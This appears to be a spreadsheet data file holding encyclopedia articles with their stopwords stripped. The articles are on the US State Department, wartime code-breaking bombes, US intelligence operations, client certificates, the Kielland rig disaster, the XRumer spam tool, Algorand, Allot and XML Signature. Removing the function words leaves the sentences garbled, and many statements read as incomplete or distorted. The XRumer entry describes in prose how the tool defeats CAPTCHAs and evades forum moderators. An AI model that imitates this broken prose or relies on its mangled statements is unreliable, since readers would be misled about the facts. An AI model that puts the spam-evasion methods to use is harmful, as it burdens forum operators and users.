secretary state chief executive officer department state member cabinet answers directly advises, president united states. secretary organizes supervises entire department staff. staff under obama administration, website department state indicated state department's 75,547 employees included 13,855 foreign service officers; 49,734 locally employed staff, whose duties primarily serving overseas; 10,171 predominantly domestic civil service employees. other agencies since 1996 reorganization, administrator agency international development (usaid), leading independent agency, also reports secretary state, ambassador united nations. vacancies november 2018, people nominated ambassadorships countries confirmed senate, nominated ambassadorships additional countries (including saudi arabia, turkey, mexico, egypt, jordan, south africa, singapore). november 2019, quarter embassies around world—including japan, russia canada—still ambassador. headquarters from 1790 1800, state department headquartered philadelphia, national capital time. occupied building church fifth street. 1800, moved philadelphia washington, d.c., briefly occupied treasury building seven buildings 19th street pennsylvania avenue.the state department moved several times throughout capital ensuing decades, including buildings september 1800; office building west white house following may; treasury building september 1819 november 1866; washington city orphan home november 1866 july 1875; state, war, navy building 1875.since 1947, state department based harry truman building, originally intended house department defense; since undergone several expansions renovations, recently 2016. previously known "main state building", september 2000 renamed honor president harry truman, major proponent internationalism diplomacy.as located foggy bottom neighborhood washington, sometimes metonymically referred "foggy bottom". programs professional fellows department state recent years rolled professional exchange fellows risen professional ranks lives chosen embassies worldwide professional fellows state department spending time united states interacting american colleagues, leadership counterparts. fulbright program fulbright program, including fulbright–hays program, program competitive, merit-based grants international educational exchange students, scholars, teachers, professionals, scientists artists, founded united states senator william fulbright 1946. under fulbright program, competitively selected citizens become eligible scholarships study, conduct research, exercise talents abroad; citizens countries qualify united states. program established increase mutual understanding people united states countries exchange persons, knowledge, skills. fulbright program provides 8,000 grants annually undertake graduate study, advanced research, university lecturing, classroom teaching. 2015–16 cycle, american applicants successful securing research english teaching assistance grants, respectively. however, selectivity application numbers vary substantially country type grant. example, grants awarded americans applying teach english laos applicants research laos. contrast, applicants applying teach english belgium successful compared applicants research belgium.the department state's bureau educational cultural affairs sponsors fulbright program annual appropriation u.s. congress. additional direct in-kind support comes partner governments, foundations, corporations, host institutions outside fulbright program administered cooperating organizations like institute international education. operates countries around world. countries, bi-national fulbright commission administers oversees fulbright program. countries without fulbright commission active program, public affairs section embassy oversees fulbright program. more 360,000 persons participated program since began. fifty-four fulbright alumni nobel prizes; eighty-two pulitzer prizes. jefferson science fellows program jefferson science fellows program established 2003 establish model engaging american academic science, technology, engineering medical communities formulation implementation foreign policy.the fellows called, chosen program) paid around $50,000 program earn special bonuses $10,000. program's intent equip fellows awareness procedural intricacies department state/usaid, help daily operations. program applied for, follows process starting august, takes year learn candidate's ranking results. awards solely achievement based, intelligence writing skills support one's suitability position committee determines. candidate applies program online, entails submitting curriculum vitae, statement interest written essay. opportunity provided upload letters recommendations nominations support one's application. franklin fellows program franklin fellows program established 2006 bring mid-level executives private sector non-profit organizations advise department work projects.fellows also work government entities, including congress, white house, executive branch agencies, including department defense, department commerce, department homeland security. program named honor benjamin franklin, aims attract mid-career professionals enrich expand department's capabilities. unlike jefferson science fellows program, franklin fellowship year-long volunteer position obtain sponsor support participate personal resources. participation areas assigned franklin fellows determined several factors, including issues priority country well candidate's degree career seniority personal interests. young southeast asian leaders initiative (yseali) also young southeast asian leaders initiative young southeast asian leaders initiative (yseali) (pronounced program emerging leaders southeast asia. program launched president barack obama manila december 2013 strengthen leadership development, networking, cultural exchange among emerging leaders within range years member-states association southeast asian nations timor leste. yseali's programs include competitive exchange fellowship programs united states, virtual on-ground workshops within southeast asia, seed grant funding opportunities. programs fall core themes civic engagement, sustainable development, economic development, governance, environment.notable alumni yseali include vico sotto, syed saddiq, carrie tan, chean chung. young african leaders initiative (yali) also young african leaders initiative young african leaders initiative (yali) program emerging young leaders africa. begun 2010 president barack obama promote education networking among emerging african leaders mandela washington fellowship brings study united states weeks, follow-up resources, student exchange programs. 2014, program expanded include four regional "leadership centers" ghana, kenya, senegal south africa. diplomats residence diplomats residence career foreign service officers specialists located throughout provide guidance advice careers, internships, fellowships students professionals communities serve. diplomats residence located population-based regions throughout united states. military components department state wing 1978, bureau international narcotics enforcement affairs (inl) formed office excess military government aircraft support counter-narcotics operations foreign states. first aircraft used crop duster used eradicate illicit crops mexico cooperation local authorities. separate wing established 1986 aviation assets grew drugs.the aircraft fleet grew crop spraying planes larger transports helicopters support ground troops move personnel. operations became involved direct combat, need search rescue armed escort helicopters became evident. operations 1980s 1990s primarily carried colombia, guatemala, peru, bolivia belize. many aircraft since passed governments involved, become able take operations themselves.after september attacks subsequent terror, wing went expand operations mainly anti-narcotics operations providing security support united states nationals interests, primarily afghanistan pakistan. safe transports various diplomatic missions undertaken, requiring acquisition larger aircraft, sikorsky s-61, boeing vertol ch-46, beechcraft king haviland dhc-8-300. 2011, wing operating aircraft around world, main missions still counter narcotics transportation state officials. naval support unit: department state 1964, height cold war, seabees assigned state department listening devices found embassy united states moscow; initial unit called "naval mobile construction battalion four, detachment november". u.s. constructed embassy warsaw, seabees dispatched locate "bugs". this creation naval support unit 1966, made permanent years later. that year william darrah, seabee support unit, credited saving u.s. embassy prague, czechoslovakia potentially disastrous fire. 1986, result reciprocal expulsions ordered washington moscow" seabees sent "moscow leningrad help keep embassy consulate functioning".the support unit limited number special billets select ncos, above. these seabees assigned department state attached diplomatic security. those chosen assigned regional security officer specific embassy part team traveling embassy next. duties include installation alarm systems, cctv cameras, electromagnetic locks, safes, vehicle barriers, securing compounds. they also assist security engineering sweeping embassies (electronic counter-intelligence). they tasked construction renovations security sensitive areas supervise private contractors non-sensitive areas. diplomatic protocol support unit required wear civilian clothes time duty receive supplemental clothing allowance this. information regarding assignment scant, state department records 1985 indicate department security employees, plus 1,200 marines seabees. that seabee number roughly today. expenditures 2010 department state, together "other international programs" (such usaid), combined projected discretionary budget $51.7 billion. united states federal budget fiscal year 2010, entitled responsibility', specifically 'imposes transparency budget' department state.the end-of-year 2010 agency financial report, approved secretary clinton november 2010, showed actual total costs year $27.4 billion. revenues $6.0 billion, $2.8 billion earned provision consular management services, reduced total cost $21.4 billion.total program costs 'achieving peace security' $7.0 billion; 'governing justly democratically', $0.9 billion; 'investing people', $4.6 billion; 'promoting economic growth prosperity', $1.5 billion; 'providing humanitarian assistance', $1.8 billion; 'promoting international understanding', $2.7 billion; 'strengthening consular management capabilities', $4.0 billion; 'executive direction other costs assigned', $4.2 billion. audit expenditures department state's independent auditors kearney company. since 2009 kearney company qualified audit opinion, noting material financial reporting weaknesses, restated 2009 financial statements 2010. 2010 audit report, kearney company provided unqualified audit opinion noting significant deficiencies, controls relation financial reporting budgetary accounting, compliance number laws provisions relating financial management accounting requirements. response chief financial officer observed "the department equal large multi-national corporation." central foreign policy file since 1973 primary record keeping system department state central foreign policy file. consists copies official telegrams, airgrams, reports, memorandums, correspondence, diplomatic notes, documents related foreign relations. over 1,000,000 records spanning time period 1973 1979 accessed online national archives records administration. freedom information processing performance 2015 center effective government analysis federal agencies receive freedom information (foia) (using 2012 2013 data), state department lowest performer, earning scoring possible points, unchanged 2013. state department's score dismal extremely processing score percent, completely line agency's performance. also awards united states department state diplomatic missions united states diplomatic reception rooms five nations passport group foreign policy united states history united states foreign policy timeline united states diplomatic history united states foreign service notes references bibliography primary sources foreign service journal, complete issues consular bureau's monthly news magazine, 1919-present @statedept official departmental twitter account state.gov official departmental website 2017—2021 state.gov archived website diplomatic records trump administration 2009—2017 state.gov archived website diplomatic records obama administration further reading allen, debra historical dictionary diplomacy revolution secession (scarecrow press, 2012), 1775–1861. bacchus, william foreign policy bureaucratic process: state department's country director system (1974 campbell, john franklin. foreign affairs fudge factory (1971) colman, jonathan. "the ‘bowl jelly’: department state kennedy johnson years, 1961–1968." hague journal diplomacy 10.2 (2015): 172-196. =online dougall, richardson, "the department state hull acheson." diplomats, 1939-1979 (princeton university press, 2019). 38-64. online farrow, ronan (2018). peace: diplomacy decline american influence. norton company. isbn 978-0393652109. keegan, nicholas consular representation britain since 1790 (anthem press, 2018). kopp, harry career diplomacy: life work foreign service (georgetown university press, 2011). krenn, michael. black diplomacy: african americans state department, 1945-69 (2015).* leacacos, john fires in-basket: abc's state department (1968) mcallister, william toward "thorough, accurate, reliable": history foreign relations united states series government printing office, 2015), history publication diplomatic documents online plischke, elmer. u.s. department state: reference history (greenwood press, 1999) schake, kori state disrepair: fixing culture practices state department. (hoover press, 2013). simpson, smith. anatomy state department (1967) warwick, donald theory public bureaucracy: politics, personality organization state department (1975). external links official website department state usaspending.gov u.s. department state federal register frontline diplomacy: foreign affairs oral history collection association diplomatic studies training library congress works united states department state internet archive (historic archives)</t>
  </si>
  <si>
    <t>United States Naval Computing Machine Laboratory</t>
  </si>
  <si>
    <t>united states naval computing machine laboratory (ncml) highly secret design manufacturing site code-breaking machinery located building national cash register (ncr) company dayton, ohio operated united states navy world list ieee milestones, machines display national cryptologic museum. history laboratory established 1942 navy national cash register company design manufacture series code-breaking machines ("bombes") targeting german enigma machines, based earlier work british bletchley park (which turn owed something pre-war polish cryptanalytical work). joseph desch effort. preliminary designs, approved september 1942, called fully electronic machine delivered year's end. however, plans soon judged infeasible, revised plans approved january 1943 electromechanical machine, became navy bombe. these designs proceeding parallel with, influenced british attempts build high-speed bombe german 4-rotor enigma. indeed, alan turing visited dayton december 1942. reaction enthusiastic: seems pity build machine stopping necessary. converted extent thinking starting scratch design bombe, method good own. american bombe program produce bombes, wheel order. used smile inwardly conception bombe routine implied program. their test commutators) hardly considered conclusive testing bounce electronic stop finding devices. nobody seems told rods offiziers banburismus unless really going something it.the american approach was, however, successful. first experimental bombes went operation 1943, running dayton could observed engineers. designs production models completed april, 1943, initial operation starting early june. told, laboratory constructed bombes employed code-breaking navy's signals intelligence cryptanalysis group op-20-g washington, d.c. construction accomplished three shifts waves (women accepted volunteer emergency service), navy officers enlisted men, large civilian workforce. approximately 3,000 workers operated bombes produce "ultra" decryptions german enigma traffic. according contemporary navy report (dated april 1944), bombes used naval jobs daily keys run; machines used non-naval tasks. during previous months, bombe time devoted non-naval problems carried request british. british production reliability problems high-speed bombes recently construction additional navy units army force keys. documentary, ″dayton codebreakers″, producer aileen leblanc, released 2006 american public television. building location dayton, building former national cash register company, deco design dayton firm schenck williams located patterson blvd stewart street. building demolished university dayton january 2008. also cryptanalysis enigma bomba (cryptography) bombe bletchley park ultra bibliography history bombe project navy memo, april 1944) john lee, colin burke, deborah anderson, "the bombes, ncr, joseph desch, waves: first reunion naval computing machine laboratory", ieee annals history computing, volume july september 2000. dayton codebreakers ieee global history network ieee history center oral history interview robert mumma, charles babbage institute, university minnesota. mumma recounts ncr's war-time work cryptanalytic equipment took company's effort, shaped company policy resisting government contract work war. oral history interview carl rench, charles babbage institute, university minnesota. debrosse, jim; burke, colin (2004), secret building untold story america's ultra against u-boat enigma codes, random house, isbn 978-0375508073 references</t>
  </si>
  <si>
    <t>United States intelligence operations abroad</t>
  </si>
  <si>
    <t>united states widely considered extensive sophisticated intelligence network nation world, organizations including central intelligence agency national security agency, amongst others. conducted numerous espionage operations foreign countries, including allies rivals. this includes industrial espionage cyber espionage. through combination hacking secret court orders american technology companies, united states also employed mass surveillance ordinary individuals, american foreign nationals alike. many operations generated public criticism unethical; examples include overthrow foreign governments, nonconsensual human experiments, extraordinary rendition, torture, targeted killings, assassinations, funding training militants would kill civilians non-combatants. edward snowden disclosures global surveillance cache secret documents leaked 2013 ex-nsa contractor edward snowden, obtained working booz allen hamilton, largest contractors defense intelligence united states., revealed operational details u.s. national security agency (nsa) international partners' global surveillance foreign nationals u.s. citizens. addition trove u.s. federal documents, snowden's cache reportedly contains thousands australian, british canadian intelligence files accessed exclusive "five eyes" network. june 2013, first snowden's documents published simultaneously washington post guardian, attracting considerable public attention. disclosure continued throughout entire year 2013, significant portion full cache estimated million documents later obtained published many media outlets worldwide, notably york times, canadian broadcasting corporation, australian broadcasting corporation, spiegel (germany), globo (brazil), monde (france), l'espresso (italy), handelsblad (the netherlands), dagbladet (norway), país (spain), sveriges television (sweden).these media reports shed light implications several secret treaties signed members ukusa community efforts implement global surveillance. example, spiegel revealed german bundesnachrichtendienst (bnd) transfers "massive amounts intercepted data nsa", sveriges television revealed national defence radio establishment (fra) provided data cable collection, secret treaty signed 1954 bilateral cooperation surveillance. other security intelligence agencies involved practice global surveillance include australia (asd), britain (gchq), canada (csec), denmark (pet), france (dgse), germany (bnd), italy (aise), netherlands (aivd), norway (nis), spain (cni), switzerland (ndb), well israel (isnu), receives raw, unfiltered data u.s. citizens shared nsa.the disclosure provided impetus creation social movements mass surveillance, restore fourth, actions like stop watching fight back. legal front, electronic frontier foundation joined coalition diverse groups filing suit nsa. several human rights organizations urged obama administration prosecute, protect, "whistleblower snowden": amnesty international, human rights watch, transparency international, index censorship, inter alia. cyber espionage snowden's revelations confirmed united states, together israel, conducted operation olympic games, covert still unacknowledged campaign sabotage means cyber disruption, directed iranian nuclear facilities. reported, first known uses offensive cyber weapons. started george bush administration 2006, olympic games accelerated president obama, heeded bush's advice continue cyber attacks iranian nuclear facility natanz. amongst things, created computer worm stuxnet, spread beyond iran's nuclear facilities internet, causing collateral damage nations india indonesia. industrial espionage 1994, united states trade officials accompanied agents various international locations london geneva japanese auto executives government officials japan-u.s. negotiations automotive trade.an article york times wrote: spying allies economic advantage crucial assignment c.i.a. american foreign policy focused commercial interests abroad. president clinton made economic intelligence high priority administration, specifically information protect defend american competitiveness, technology financial security world economic crisis spread across global markets minutes. targeted killings assassinations april 2010, u.s. president barack obama placed anwar al-awlaki list people u.s. central intelligence agency authorized kill terrorist activities. "targeted killing" american citizen unprecedented. al-awlaki's father civil rights groups challenged order court. al-awlaki believed hiding southeast yemen last years life. u.s. deployed unmanned aircraft (drones) yemen search kill him, firing failing kill least once, succeeding fatal american drone attack yemen september 2011. weeks later, al-awlaki's 16-year-old son, abdulrahman al-awlaki, u.s. citizen born denver, killed cia-led drone strike yemen. nasser al-awlaki, anwar's father, released audio recording condemning killings grandson senseless murders. june 2014, previously classified memorandum issued united states department justice released, justifying al-awlaki's death lawful war. intelligence activity location europe france 1993, cia's paris station launched economic espionage operation gain advantage negotiations 1994 general agreement tariffs trade. they attempted female operative posing public relations director save-the-rain-forest foundation honeypot trap ensnare henri plagnol, aide french prime minister édouard balladur. however, plagnol warned french counterintelligence officers seen plot told play along. over course years, french used plagnol turn tables cia, uncovering multiple operatives ultimately publicly expelling paris station chief along agents country. germany recruited dozen spies working multiple german industries, including double agent german intelligence. these spies uncovered raids ministry defense german authorities 2014. angela merkel, whose personal cellphone tapped nsa, ordered cia's berlin station chief leave country.in 2021, denmark's public service broadcaster, revealed danish defence intelligence service helped european leaders including german chancellor angela merkel 2012 2014, scheme codenamed "operation dunhammer". intelligence also collected officials germany, france, sweden norway. middle east iran 1953, worked united kingdom overthrow democratically elected government iran prime minister mohammad mossadegh attempted nationalize iran's petroleum industry, threatening profits anglo-iranian company, known declassified documents show britain fearful iran's plans nationalize industry pressed u.s. mount joint operation depose prime minister install puppet regime. 1951 iranian parliament voted nationalize petroleum fields country.the coup operative kermit roosevelt, (grandson president theodore roosevelt). with help british intelligence, planned, funded implemented operation ajax. months coup, u.s. imposed boycott country, exerted political pressures, conducted massive covert propaganda campaign create environment necessary coup. hired iranian agents provocateurs posed communists, harassed religious leaders staged bombing cleric's home turn islamic religious community government. u.s. audience, hoped plant articles u.s. newspapers saying shah mohammed reza pahlevi's return govern iran resulted homegrown revolt represented u.s. public communist-leaning government. successfully used contacts associated press newswire u.s. statement tehran royal decrees written.the coup initially failed shah fled country. after four days rioting, shi'ite-sparked street protests backed pro-shah army units defeated mossadeq's forces shah returned power.the subsequently used apparent success iranian coup project bolster image american government circles. they expanded reach countries, taking greater portion american intelligence assets based record iran.in august 2013 admitted involved planning execution coup, including bribing iranian politicians, security army high-ranking officials, well pro-coup propaganda. quoted acknowledging coup carried "under direction" u.s. foreign policy, conceived approved highest levels government." national security archive said "applauds cia's decision make materials available, today's posting shows clearly materials could safely declassified many years without risk damage national security." asia york times reported 2017 "the chinese government systematically dismantled c.i.a. spying operations country starting 2010, killing imprisoning dozen sources years crippling intelligence gathering years afterward. current former american officials described intelligence breach worst decades." also stuxnet anwar al-awlaki office strategic influence united states state-sponsored terrorism references</t>
  </si>
  <si>
    <t>Client certificate</t>
  </si>
  <si>
    <t>cryptography, client certificate type digital certificate used client systems make authenticated requests remote server. client certificates play role many mutual authentication designs, providing strong assurances requester's identity. also client-authenticated handshake references</t>
  </si>
  <si>
    <t>Client Puzzle Protocol</t>
  </si>
  <si>
    <t>client puzzle protocol (cpp) computer algorithm internet communication, whose goal make abuse server resources infeasible. implementation proof-of-work system (pow). idea require clients connecting server correctly solve mathematical puzzle establishing connection, server attack. after solving puzzle, client would return solution server, server would quickly verify, reject drop connection. puzzle made simple easily solvable requires least minimal amount computation client side. legitimate users would experience negligible computational cost, abuse would deterred: clients simultaneously establish large number connections would unable computational cost (time delay). this method holds promise fighting types spam well attacks like denial-of-service. also computer security intrusion-prevention system proof-of-work system guided tour puzzle protocol references juels, ari; brainard, john (1999). "client puzzles: cryptographic countermeasure against connection depletion attacks" (pdf). kent, (ed.). proceedings ndss (networks distributed security systems). 151–165. external links press release client puzzles client puzzles: cryptographic countermeasure against connection depletion attacks client puzzle outsourcing techniques resistance</t>
  </si>
  <si>
    <t>Alexander L. Kielland (platform)</t>
  </si>
  <si>
    <t>alexander kielland norwegian semi-submersible drilling that, march 1980, capsized ekofisk field north sea, killing people. capsize worst disaster norwegian waters since second world war. rig, located approximately east dundee, scotland, owned stavanger drilling company norway hire u.s. company phillips petroleum time disaster. named norwegian writer alexander lange kielland. built mobile drilling unit french shipyard, delivered stavanger drilling july 1976. floating drill used drilling purposes served semi-submersible 'flotel' providing living quarters offshore workers. 1978 additional accommodation blocks added platform, persons could accommodated. 1980, platform providing offshore accommodation production platform edda 2/7c. within days scheduled start contract shell drilling rig. accident early evening march 1980, duty accommodation alexander kielland. conditions rainy dense fog, wind gusting knots km/h) waves metres high. kielland winched away edda production platform. minutes 18:30, board felt 'sharp crack' followed 'some kind trembling'. suddenly keilland heeled stabilised. five anchor cables broken, remaining cable preventing capsizing. list continued increase 18:53, remaining anchor cable snapped capsized. mess hall cinema capsizing occurred. keilland seven 50-man lifeboats twenty 20-man rafts. four lifeboats launched, managed release lowering cables. safety device allow release strain removed cables). fifth lifeboat came adrift surfaced upside down; occupants righted gathered nineteen water. kielland's rafts detached three rescued them. 12-man rafts thrown edda rescued thirteen survivors. seven taken supply boats seven swam edda. rescued standby vessel silver pit, took hour reach scene. people aboard rig, killed, making worst disaster norwegian offshore history since second world deadliest offshore disaster time point. most workers rogaland. around 21:30 hrs. vessel dutch company smitlloyd came location. crew vessel heard people shouting help. maneuvering great caution smitlloyd vessel encountered life raft checking raft found empty. difficult life raft deck crew raft liferafts found smitlloyd vessel also found empty. crew heard still people shouting help dense nobody seen. smitlloyd vessel stayed location several days helping coordinated rescue operation. investigation march 1981, investigative report concluded keilland collapsed fatigue crack bracings (bracing d-6), connected collapsed d-leg rest rig. this traced small fillet weld joined non-load-bearing flange plate bracing. this flange plate held sonar device used drilling operations. poor profile fillet weld contributed reduction fatigue strength. further, investigation found considerable amounts lamellar tearing flange plate cold cracks underlying groove weld. cold cracks welds, increased stress concentrations weakened flange plate, poor weld profile, cyclical stresses (which would common north sea) seemed collectively play role rig's collapse. judging paint part fractured surface, crack probably improper work rig's construction 1976. other major structural elements failed sequence, destabilising entire structure. design flawed owing absence structural redundancy. keilland recovered 1983 third attempt. scuttled later year nedstrand fjord search missing bodies completed, well several tests determine cause disaster. consequences response kielland disaster, north offshore installations tightened command organization, identifying clear authority would order abandonment case emergency. fourteen minutes initial failure rig's eventual capsize left window personnel board could escaped, effective command structure place. these revised command structures, similar conventional shipping command structures, frequently vessels lose anchorage storm conditions fixed installations threatened out-of-control vessels. failure deploy lifeboats legislation regarding on-load release hooks lifeboats rigs. consequence, international maritime organization issued requirement lifeboats merchant ships fitted hooks could released even load.a memorial disaster erected 1986 coast kvernevik. named "broken chain" (norwegian: brutt lenke), memorial depicts broken chain link. weighs five tonnes (5.5 tons) stands four metres high. similar incidents long kielland capsized, sister rig, henrik ibsen, suffered jammed ballast valve, causing list twenty degrees, later righted again. approximately eighteen months later, ocean ranger capsized similar weather conditions newfoundland coast. investigation cause ocean ranger disaster united states coast guard established structural failure factor. references external links animation failure analysis associates (now exponent) petroleum museum, norway disasters listing descriptions</t>
  </si>
  <si>
    <t>XRumer</t>
  </si>
  <si>
    <t>xrumer piece software made spamming online forums comment sections. marketed program search engine optimization created botmasterlabs. able register post forums (forum spam) boosting search engine rankings. program able bypass security techniques commonly used many forums blogs deter automated spam, account registration, client detection, many forms captchas, e-mail activation posting. program utilises socks http proxies attempt make difficult administrators block posts source features proxy checking tool verify integrity anonymity proxies used. addition, software avoid suspicions forum administrators first registering make post form question mentions spam product ("where get...?"), registering another account post spam link mentions product. side effect innocent-looking posts helpful forum visitors search search engine (e.g. google) product post link help out, thus bolstering product's google ranking without falling afoul forum posting policies. software also capable avoiding detection making posts off-topic, spam overflow sections forums, thus attempting keep activities high activity content areas targeted forum. however, platforms used spam includes website comment spam. method operation xrumer capable posting blogs guestbooks addition main role automated forum posting tool. also create forum profiles complete signature attempt avoid alerting forum administrators topic forum posts. software also able gather decipher artificial intelligence security questions (i.e. 2+2?) often used forums upon registration. since latest version xrumer, software capable collecting security questions multiple sources much effective defeating them. helper program hrefer also included. this software used automatically parse results search engines including google, yahoo, bing yandex forums blogs used target list main xrumer application.according register, october 2008, xrumer defeat captchas hotmail gmail. this enables software create accounts free email services, used register forums posts xrumer also posts slowly initially, attempt avoid detection posting unnaturally fast. between 2009 2011 xrumer longer recognized hotmail gmail captchas change captcha format. users xrumer could defeat captchas utilizing external human captcha services. defenses webmasters topical forums face ongoing battle xrumer software, users almost always violation forum terms service, and/or interest actual forum topic. users software created entire industry whose sole purpose protect internet sites users xrumer. forum administration tasks xrumer often constant, daily effort, include identifying user accounts xrumer users, deleting posts/threads created software, deleting/disabling user accounts. easiest method defeat xrumer simply require first post forum member blog poster approved appear. there several resources help block forum spam, reference reports forum spam username address. user/ip appeared site's lists, highly likely black-hat user xrumer. common defensive actions webmasters institute ip-based posting bans subnetworks used spammers. spam messages forum typically take form "link spam" often included older topics private messages (pms) leaving newer threads posted messages "clear" apparent spam. sophisticated spammers copy posts areas site, giving appearance valid, on-topic reply. best clue spammer links user profile completely unrelated forum topic, posted messages, seemingly within general topic forum, non-sequiturs out-of-place within topic thread. alternatively, spammers post generic excited begin posting contributing here." messages content-neutral. damage caused forums classified several areas: first foremost, admin time clean forum; second, server bandwidth accommodate spam postings; third, storage requirements forum server spam messages devoid content; fourth, community alienation irritation around seeing spam; fifth, offense innocent forum members posts mistaken spam accounts suspended error suspected spamming; sixth, lowering information-to-noise ratio forum, diminishes value forum, skewing usage/active user statistics used determine advertising rates. e-mail account creation latest update xrumer software able automatically register e-mail accounts mail.ru (russian addresses only) gmail. support creating e-mail accounts automated fashion hotmail completely removed. technique employed xrumer bypass captcha protection gmail mail.ru averaging. captcha challenge-response test frequently used internet services order verify user actually human rather computer program. commonly, captchas dynamically created images random numbers and/or letters. these images distorted human still recognize goal make automatic recognition impossible. captchas used free-mail services prevent automatic creation huge number email accounts protect automatic form submissions blogs, forums article directories. november 2012, xrumer cracked recaptcha, able successfully post forums/blogs averaging common method physics reduce noise input data. averaging attack used image-based captchas following conditions met: predominant distortion captcha noise-like nature. possible extract series different images information encoded them. averaging series images used improve image quality (reduce distortion, improve signal-to-noise ratio, say) captchas hence make easily recognizable (optical character recognition) systems. fact noise payload behave differently "reload" exploited. this allows program separate hence defeat captcha without need sophisticated algorithm. references external links brian krebs january 2007). "scary blogspam automation tools". washington post. archived original january 2012. retrieved january 2007. "malware targets bloggers". itweb. august 2007. retrieved august 2007.</t>
  </si>
  <si>
    <t>Algorand</t>
  </si>
  <si>
    <t>algorand proof-of-stake blockchain cryptocurrency protocol. algorand's native cryptocurrency called algo. history algorand founded 2017 silvio micali, professor mit. algorand composed company foundation. algorand foundation manages ecosystem growth, award funding, cryptographic research primitives, on-chain governance decentralization algorand network, including nodes. core development algorand protocol overseen algorand inc., private corporation based boston. algorand test network launched public april 2019, main network launched june 2019. research algorand foundation handles blockchain research project. cryptographer rabin. design algorand intended solve "blockchain trilemma": claim blockchain system three desirable properties: decentralization, scalability, security. system three could nodes moderate consumer-grade resources (i.e. need datacenter large cluster virtual machines), transaction processing scales total network resources (rather resources available per-node), could subverted attackers individually possess large fraction network's total resources. consensus algorithm algorand uses byzantine agreement protocol leverages proof-of-stake. long supermajority stake non-malicious hands, protocol tolerate malicious users, achieving consensus without central authority. consensus algorand requires three steps propose, confirm write block blockchain. steps propose, soft vote certify vote. first phase (the block proposal phase) uses proof stake principles. during phase, committee users system selected randomly, though manner weighted, propose block. selection committee done process called "cryptographic sortition", user determines whether committee locally executing verifiable random function (vrf). indicates user chosen, returns cryptographic proof used verify user committee. likelihood given user committee influenced number algo tokens held user (the stake).after determining user block selection committee, user build proposed block disseminates network review/analysis second phase. user includes cryptographic proof proposed block demonstrate committee membership.in second phase (the block finalization phase), byzantine agreement protocol (called "ba*") used vote proposed blocks. second phase, committee formed cryptographic sortition. when users determined second-phase voting committee, analyze proposed blocks received (including verification first-phase committee membership) vote whether blocks adopted. voting committee achieves consensus block, block disseminated across network.within algorand consensus algorithm, membership committees changes every time phase run. this protects users targeted attacks, attacker know advance users going committee. different algorand blocks cannot reach consensus round. according external security audit, model also accounts timing issues adversary actions, e.g., adversary control message delivery. smart contracts smart contracts algorand known asc1 (algorand smart contracts). references</t>
  </si>
  <si>
    <t>Allot</t>
  </si>
  <si>
    <t>allot ltd., formerly allot communications, israeli high-tech company develops telecommunications software. history allot founded 1996, michael shurman yigal jacoby. 2004, company raised million several rounds funding several venture capital fund. november 2006, became publicly traded company nasdaq global market ticker symbol allt. raised million. november 2010, allot's dual listing aviv stock exchange approved. allot provides network intelligence network-based security products communication service providers (csps) mobile broadband, wireless broadband, mobile satellite service, carriers, well enterprises.in 2011, reported equipment sold allot illegally reached iran. however, january 2012 allot cleared israeli ministry defense wrongdoing, investigation concluded company unaware internet monitoring equipment sold danish distributor ended iranian hands. also 2011, allot settled class-action lawsuit regarding securities fraud involving stock whereby agreed $1.3 million (usd). references</t>
  </si>
  <si>
    <t>XML Signature</t>
  </si>
  <si>
    <t>signature (also called xmldsig, xml-dsig, xml-sig) defines syntax digital signatures defined recommendation signature syntax processing. functionally, much common pkcs extensible geared towards signing documents. used various technologies soap, saml, others. signatures used sign data–a resource–of type, typically documents, anything accessible signed. signature used sign resource outside containing document called detached signature; used sign part containing document, called enveloped signature; contains signed data within called enveloping signature. structure signature consists signature element http://www.w3.org/2000/09/xmldsig# namespace. basic structure follows: signedinfo element contains references signed data specifies algorithms used. signaturemethod canonicalizationmethod elements used signaturevalue element included signedinfo protect tampering. reference elements specify resource signed reference transformations applied resource prior signing. transforms contains transformations applied resource prior signing. transformation xpath-expression selects defined subset document tree. digestmethod specifies hash algorithm applying hash. digestvalue contains base64 encoded result applying hash algorithm transformed resource(s) defined reference element attributes. signaturevalue element contains base64 encoded signature result signature generated parameters specified signaturemethod element signedinfo element applying algorithm specified canonicalizationmethod. keyinfo element optionally allows signer provide recipients validates signature, usually form x.509 digital certificates. relying party must identify context keyinfo present. object element (optional) contains signed data enveloping signature. validation security considerations when validating signature, procedure called core validation followed. reference validation: each reference's digest verified retrieving corresponding resource applying transforms specified digest method result compared recorded digestvalue; match, validation fails. signature validation: signedinfo element serialized using canonicalization method specified canonicalizationmethod, data retrieved using keyinfo means, signature verified using method specified signaturemethod.this procedure establishes whether resources really signed alleged party. however, extensibility canonicalization transform methods, verifying party must also make sure actually signed digested really present original data, words, algorithms used trusted change meaning signed data. because signed document's structure tampered leading "signature wrapping" attacks, validation process also cover document structure. signed element signature element selected using absolute xpath expression, getelementbyname methods. canonicalization creation signatures substantially complex creation ordinary digital signature given document "infoset", common usage among developers) legal serialized representation. example, whitespace inside element syntactically significant, &lt;elem syntactically identical &lt;elem&gt;. since digital signature ensures data integrity, single-byte difference would cause signature vary. moreover, document transferred computer computer, line terminator changed etc. program digests validates document later render document different way, e.g. adding excess space attribute definitions element definition, using relative (vs. absolute) urls, reordering namespace definitions. canonical especially important signature refers remote document, rendered time-varying ways errant remote server. avoid problems guarantee logically-identical documents give identical digital signatures, canonicalization transform (frequently abbreviated c14n) employed signing documents (for signing signedinfo, canonicalization mandatory). these algorithms guarantee semantically-identical documents produce exactly identical serialized representations. another complication arises default canonicalization algorithm handles namespace declarations; frequently signed document needs embedded another document; case original canonicalization algorithm yield result document treated alone. reason, so-called exclusive canonicalization, serializes namespace declarations independently surrounding xml, created. benefits signature flexible forms digital signatures pretty good privacy cryptographic message syntax, operate binary data, infoset, allowing work subsets data (this also possible binary data non-standard ways, example encoding blocks binary data base64 ascii), various ways bind signature signed information, perform transformations. another core concept canonicalization, sign "essence", eliminating meaningless differences like whitespace line endings. issues there criticisms directed architecture security general, suitability canonicalization particular front signing encrypting data complexity, inherent processing requirement, poor performance characteristics. argument performing canonicalization causes excessive latency simply much overcome transactional, performance sensitive applications. these issues addressed security working group.without proper policy implementation dsig soap ws-security lead vulnerabilities, signature wrapping. applications example applications signatures: digital signing xbrl annual reports auditors netherlands. pkioverheid x.509 certificate, approved royal national institute chartered accountants, required. electronic signature legally binding. assurance standard part dutch standard business reporting program. also canonical encryption xades, extensions xml-dsig advanced electronic signature cryptographic message syntax references external links signature syntax processing canonical additional security uniform resource identifiers (uris) exclusive canonicalization xmlsignatures java binding xmlbeans jaxb. step-by-step example signature created.</t>
  </si>
  <si>
    <t>XML Encryption</t>
  </si>
  <si>
